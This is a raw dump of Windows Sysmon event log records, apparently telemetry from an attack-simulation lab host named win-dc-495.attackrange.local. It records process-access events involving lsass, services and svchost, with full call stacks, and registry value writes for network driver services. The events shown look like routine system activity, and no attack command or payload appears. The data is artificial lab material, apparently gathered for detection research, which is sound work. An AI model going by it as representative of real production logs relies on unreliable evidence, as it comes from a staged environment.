13:33:58.705{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMajorVersionDWORD (0x0000000a) 13241300x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.689{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMajorVersionDWORD (0x00000006) 10341000x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.689{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.674{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.674{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.674{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0A00-00000000A301}848944C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 